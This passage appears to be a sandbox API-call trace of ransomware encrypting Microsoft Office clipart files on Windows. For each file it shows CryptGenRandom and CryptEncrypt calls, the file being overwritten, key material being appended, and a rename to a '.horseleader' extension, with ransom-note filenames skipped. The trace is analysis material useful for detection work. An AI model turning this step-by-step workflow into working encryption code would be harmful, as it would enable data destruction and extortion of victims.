office\\clipart\\pub60cor\\bd00146_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf.horseleader")) returned 1 [0253.134] GetProcessHeap () returned 0x780000 [0253.134] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.134] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d1cf00, ftCreationTime.dwHighDateTime=0x1bd4fa4, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1d1cf00, ftLastWriteTime.dwHighDateTime=0x1bd4fa4, nFileSizeHigh=0x0, nFileSizeLow=0x2d74, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD00155_.WMF", cAlternateFileName="")) returned 1 [0253.135] lstrcmpiW (lpString1="BD00155_.WMF", lpString2="Windows") returned -1 [0253.135] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 
67 [0253.136] StrStrIW (lpFirst="BD00155_.WMF", lpSrch=".horseleader") returned 0x0 [0253.136] lstrcmpW (lpString1="BD00155_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.136] lstrcmpW (lpString1="BD00155_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.136] lstrlenW (lpString=".testttjffg") returned 11 [0253.136] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.136] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.136] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.136] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.137] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 67 [0253.137] StrStrW (lpFirst="BD00155_.WMF", lpSrch=".txt") returned 0x0 [0253.137] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=11636) returned 1 [0253.137] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2d74, lpOverlapped=0x0) returned 1 [0253.140] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd28c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.141] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2d74, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2d74, lpOverlapped=0x0) returned 1 [0253.141] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.141] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.141] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.141] CloseHandle (hObject=0x158) returned 1 [0253.142] GetProcessHeap () returned 0x780000 [0253.142] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.142] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF.horseleader") returned 79 [0253.142] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf.horseleader")) returned 1 [0253.143] GetProcessHeap () returned 0x780000 [0253.143] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.143] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaaac100, ftCreationTime.dwHighDateTime=0x1bd4fa3, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfaaac100, 
ftLastWriteTime.dwHighDateTime=0x1bd4fa3, nFileSizeHigh=0x0, nFileSizeLow=0x57f4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD00160_.WMF", cAlternateFileName="")) returned 1 [0253.143] lstrcmpiW (lpString1="BD00160_.WMF", lpString2="Windows") returned -1 [0253.143] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 67 [0253.143] StrStrIW (lpFirst="BD00160_.WMF", lpSrch=".horseleader") returned 0x0 [0253.143] lstrcmpW (lpString1="BD00160_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.144] lstrcmpW (lpString1="BD00160_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.144] lstrlenW (lpString=".testttjffg") returned 11 [0253.144] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.144] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.144] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.144] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.146] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 67 [0253.146] StrStrW (lpFirst="BD00160_.WMF", lpSrch=".txt") returned 0x0 [0253.146] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=22516) returned 1 [0253.146] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.149] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.149] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.150] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x7f4, lpOverlapped=0x0) returned 1 [0253.150] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff80c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.150] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x7f4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x7f4, lpOverlapped=0x0) returned 1 [0253.150] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.150] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.151] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.151] CloseHandle (hObject=0x158) returned 1 [0253.151] GetProcessHeap () returned 0x780000 [0253.151] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 
[0253.151] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.horseleader") returned 79 [0253.151] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf.horseleader")) returned 1 [0253.156] GetProcessHeap () returned 0x780000 [0253.156] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.156] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcafbb900, ftCreationTime.dwHighDateTime=0x1bd4fa3, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcafbb900, ftLastWriteTime.dwHighDateTime=0x1bd4fa3, nFileSizeHigh=0x0, nFileSizeLow=0x3f34, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD00173_.WMF", cAlternateFileName="")) returned 1 [0253.156] lstrcmpiW (lpString1="BD00173_.WMF", lpString2="Windows") returned -1 [0253.156] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 67 [0253.156] StrStrIW (lpFirst="BD00173_.WMF", lpSrch=".horseleader") returned 0x0 [0253.156] lstrcmpW (lpString1="BD00173_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.156] lstrcmpW (lpString1="BD00173_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.156] lstrlenW (lpString=".testttjffg") returned 11 [0253.156] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF", lpSrch=".testttjffg") 
returned 0x0 [0253.156] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.156] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.156] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.157] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 67 [0253.157] StrStrW (lpFirst="BD00173_.WMF", lpSrch=".txt") returned 0x0 [0253.157] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=16180) returned 1 [0253.157] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3f34, lpOverlapped=0x0) returned 1 [0253.160] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc0cc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.160] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3f34, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3f34, lpOverlapped=0x0) returned 1 [0253.160] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.161] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, 
lpOverlapped=0x0) returned 1 [0253.161] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.161] CloseHandle (hObject=0x158) returned 1 [0253.161] GetProcessHeap () returned 0x780000 [0253.161] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.161] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.horseleader") returned 79 [0253.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf.horseleader")) returned 1 [0253.162] GetProcessHeap () returned 0x780000 [0253.162] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.162] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4354, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD05119_.WMF", cAlternateFileName="")) returned 1 [0253.162] lstrcmpiW (lpString1="BD05119_.WMF", lpString2="Windows") returned -1 [0253.162] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 
67 [0253.163] StrStrIW (lpFirst="BD05119_.WMF", lpSrch=".horseleader") returned 0x0 [0253.163] lstrcmpW (lpString1="BD05119_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.163] lstrcmpW (lpString1="BD05119_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.163] lstrlenW (lpString=".testttjffg") returned 11 [0253.163] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.163] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.163] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.163] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.164] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 67 [0253.164] StrStrW (lpFirst="BD05119_.WMF", lpSrch=".txt") returned 0x0 [0253.164] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=17236) returned 1 [0253.164] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4354, lpOverlapped=0x0) returned 1 [0253.168] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffbcac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.168] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4354, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4354, lpOverlapped=0x0) returned 1 [0253.168] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.168] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.168] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.168] CloseHandle (hObject=0x158) returned 1 [0253.169] GetProcessHeap () returned 0x780000 [0253.169] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.169] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF.horseleader") returned 79 [0253.169] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf.horseleader")) returned 1 [0253.170] GetProcessHeap () returned 0x780000 [0253.170] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.170] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, 
ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3ef0, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD06102_.WMF", cAlternateFileName="")) returned 1 [0253.170] lstrcmpiW (lpString1="BD06102_.WMF", lpString2="Windows") returned -1 [0253.170] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 67 [0253.170] StrStrIW (lpFirst="BD06102_.WMF", lpSrch=".horseleader") returned 0x0 [0253.170] lstrcmpW (lpString1="BD06102_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.170] lstrcmpW (lpString1="BD06102_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.170] lstrlenW (lpString=".testttjffg") returned 11 [0253.170] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.170] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.170] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.171] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.171] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 67 [0253.171] StrStrW (lpFirst="BD06102_.WMF", lpSrch=".txt") returned 0x0 [0253.171] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=16112) returned 1 [0253.171] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x3ef0, lpOverlapped=0x0) returned 1 [0253.174] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc110, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.174] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x3ef0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x3ef0, lpOverlapped=0x0) returned 1 [0253.174] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.174] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.174] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.174] CloseHandle (hObject=0x158) returned 1 [0253.174] GetProcessHeap () returned 0x780000 [0253.174] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.175] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF.horseleader") returned 79 [0253.175] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd06102_.wmf.horseleader")) returned 1 [0253.176] GetProcessHeap () 
returned 0x780000 [0253.176] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.176] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4124, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD06200_.WMF", cAlternateFileName="")) returned 1 [0253.176] lstrcmpiW (lpString1="BD06200_.WMF", lpString2="Windows") returned -1 [0253.176] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 67 [0253.176] StrStrIW (lpFirst="BD06200_.WMF", lpSrch=".horseleader") returned 0x0 [0253.176] lstrcmpW (lpString1="BD06200_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.176] lstrcmpW (lpString1="BD06200_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.176] lstrlenW (lpString=".testttjffg") returned 11 [0253.176] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.176] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.176] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, 